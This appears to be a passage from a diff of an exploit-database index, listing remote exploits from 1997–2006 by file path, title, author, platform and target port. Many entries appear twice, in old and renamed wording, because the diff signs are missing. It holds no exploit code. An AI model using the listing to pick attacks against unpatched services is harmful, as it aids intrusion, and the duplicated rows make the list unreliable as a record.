58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114
63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
@ -8724,8 +8728,8 @@ id,file,description,date,author,platform,type,port
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote,0
83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (MS03-032)",2003-08-21,malware,windows,remote,0
84,platforms/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow",2003-08-22,vade79,linux,remote,70
86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Root Exploit",2003-08-25,"Johnny Cyberpunk",multiple,remote,554
88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow",2003-08-28,vade79,linux,remote,21
86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Code Execution",2003-08-25,"Johnny Cyberpunk",multiple,remote,554
88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Buffer Overflow",2003-08-28,vade79,linux,remote,21
89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23
90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661
92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0
@ -8735,13 +8739,13 @@ id,file,description,date,author,platform,type,port
98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306
99,platforms/linux/remote/99.c,"Pine 4.56 - Remote Buffer Overflow",2003-09-16,sorbo,linux,remote,0
100,platforms/windows/remote/100.c,"Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026)",2003-09-16,ey4s,windows,remote,135
101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111
102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617
101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Code Execution",2003-09-19,"H D Moore",solaris,remote,111
102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution",2003-09-20,anonymous,linux,remote,617
103,platforms/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135
105,platforms/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308
107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution",2003-10-04,bkbll,linux,remote,21
109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135
110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / Brute Force Exploit",2003-10-13,Haggis,linux,remote,21
110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21
112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0
116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515
117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135
@ -8756,7 +8760,7 @@ id,file,description,date,author,platform,type,port
133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406
139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,linux,remote,406
143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0
149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit",2004-01-27,lion,windows,remote,21
151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
@ -8769,12 +8773,12 @@ id,file,description,date,author,platform,type,port
164,platforms/windows/remote/164.c,"Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow",2004-03-23,xfocus,windows,remote,0
165,platforms/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21
166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80
167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0
167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow",2004-03-28,"Abhisek Datta",linux,remote,0
168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0
169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0
171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0
173,platforms/linux/remote/173.pl,"Monit 4.1 - Remote Root Buffer Overflow",2004-04-09,gsicht,linux,remote,2812
174,platforms/linux/remote/174.c,"Monit 4.2 - Remote Root Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812
173,platforms/linux/remote/173.pl,"Monit 4.1 - Buffer Overflow",2004-04-09,gsicht,linux,remote,2812
174,platforms/linux/remote/174.c,"Monit 4.2 - Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812
175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote,0
181,platforms/linux/remote/181.c,"Half Life - (rcon) Remote Buffer Overflow",2000-11-16,"Sao Paulo",linux,remote,27015
189,platforms/windows/remote/189.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (6)",2000-11-18,incubus,windows,remote,80
@ -8783,13 +8787,13 @@ id,file,description,date,author,platform,type,port
192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80
201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,multiple,remote,21
204,platforms/linux/remote/204.c,"BFTPd - vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21
208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow",2000-11-30,"Babcia Padlina",linux,remote,119
208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Overflow Exploit",2000-11-30,"Babcia Padlina",linux,remote,119
211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0
213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111
220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80
225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21
226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Command Execution",2000-12-11,sk8,linux,remote,515
227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String",2000-12-11,DiGiT,linux,remote,515
227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - 'lpd' Format String",2000-12-11,DiGiT,linux,remote,515
228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128
230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515
232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0
@ -8801,20 +8805,20 @@ id,file,description,date,author,platform,type,port
263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80
268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Root Exploit",2001-05-08,qitest1,linux,remote,21
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution",2001-05-08,qitest1,linux,remote,21
275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53
282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (4)",2001-03-02,multiple,linux,remote,53
277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53
282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Stack Overflow (4)",2001-03-02,multiple,linux,remote,53
284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143
291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0
293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445
294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000
294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,hardware,remote,8000
295,platforms/windows/remote/295.c,"Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445
296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,linux,remote,0
297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554
300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401
300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401
301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow",2004-06-25,anonymous,solaris,remote,2401
303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050
304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690
@ -8826,11 +8830,11 @@ id,file,description,date,author,platform,type,port
315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0
316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Root Exploit",2001-12-20,Teso,linux,remote,23
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux,remote,23
347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0
348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535
359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535
361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
@ -8840,10 +8844,10 @@ id,file,description,date,author,platform,type,port
380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80
382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0
386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80
387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22
387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Code Execution",2004-08-09,livenn,linux,remote,22
389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote,0
390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0
391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548
391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution",2004-08-13,"Dino Dai Zovi",osx,remote,548
392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401
397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Exploit",2002-06-25,Teso,linux,remote,143
398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873
@ -8876,7 +8880,7 @@ id,file,description,date,author,platform,type,port
572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0
573,platforms/windows/remote/573.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (2)",2004-10-12,K-C0d3r,windows,remote,8000
577,platforms/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow",2004-10-15,class101,windows,remote,25
580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812
580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Code Execution",2004-10-17,rtk,linux,remote,2812
581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25
583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
@ -8886,13 +8890,13 @@ id,file,description,date,author,platform,type,port
590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000
592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21
598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow",2004-10-26,muts,windows,remote,25
608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow",2004-10-28,infamous41md,linux,remote,69
608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Heap Overflow",2004-10-28,infamous41md,linux,remote,69
609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution (PoC)",2004-10-28,infamous41md,linux,remote,0
612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow",2004-11-02,Skylined,windows,remote,0
616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80
618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
619,platforms/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow",2004-11-09,Ruder,windows,remote,808
620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String",2004-11-09,"Carlos Barros",linux,remote,25
620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Format String",2004-11-09,"Carlos Barros",linux,remote,25
621,platforms/windows/remote/621.c,"CCProxy 6.2 - (ping) Remote Buffer Overflow",2004-11-10,KaGra,windows,remote,23
623,platforms/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow",2004-11-10,class101,windows,remote,21
627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143
@ -8911,7 +8915,7 @@ id,file,description,date,author,platform,type,port
668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143
670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Remote Root Format String",2004-12-12,CoKi,linux,remote,504
681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,linux,remote,504
689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,multiple,remote,0
693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,windows,remote,21
705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,multiple,remote,10000
@ -8952,7 +8956,7 @@ id,file,description,date,author,platform,type,port
825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21
826,platforms/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203
827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow",2005-02-18,class101,windows,remote,21
828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617
828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Code Execution",2005-02-18,"John Doe",multiple,remote,617
829,platforms/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80
830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Exploit",2005-02-19,mandragore,windows,remote,8000
831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,linux,remote,5803
@ -8965,8 +8969,8 @@ id,file,description,date,author,platform,type,port
878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0
879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0
883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380
900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow",2005-03-28,infamous41md,linux,remote,25
902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21
900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25
902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21
903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143
906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031
909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42
@ -8991,7 +8995,7 @@ id,file,description,date,author,platform,type,port
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0
977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0
979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0
981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b - Linux Remote Root Format String",2005-05-05,cybertronic,linux,remote,25
981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String Exploit",2005-05-05,cybertronic,linux,remote,25
986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution",2005-05-07,"Edward Gagnon",windows,remote,0
987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote,0
990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)",2005-05-17,nolimit,windows,remote,20031
@ -9016,7 +9020,7 @@ id,file,description,date,author,platform,type,port
1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote,0
1118,platforms/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow",2005-07-25,redsand,windows,remote,21
1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String",2005-08-01,CoKi,linux,remote,143
1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143
1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution",2005-08-01,kingcope,linux,remote,143
1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Exploit",2005-08-03,cybertronic,windows,remote,6070
1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523
1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Exploiter Tool",2005-08-03,cybertronic,windows,remote,6070
@ -9066,7 +9070,7 @@ id,file,description,date,author,platform,type,port
1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21
1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21
1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21
1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
1314,platforms/linux/remote/1314.rb,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0
1330,platforms/windows/remote/1330.c,"freeFTPd 1.0.8 - 'USER' Remote Buffer Overflow",2005-11-17,Expanders,windows,remote,21
@ -9171,7 +9175,7 @@ id,file,description,date,author,platform,type,port
2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
2233,platforms/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21
2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21
2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow",2006-08-26,muts,windows,remote,110
2258,platforms/windows/remote/2258.py,"Alt-N MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow",2006-08-26,muts,windows,remote,110
2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
2274,platforms/linux/remote/2274.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)",2006-08-29,Expanders,linux,remote,0
2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0
@ -9226,11 +9230,11 @@ id,file,description,date,author,platform,type,port
2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0
2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - (Long Filename) Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69
2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389
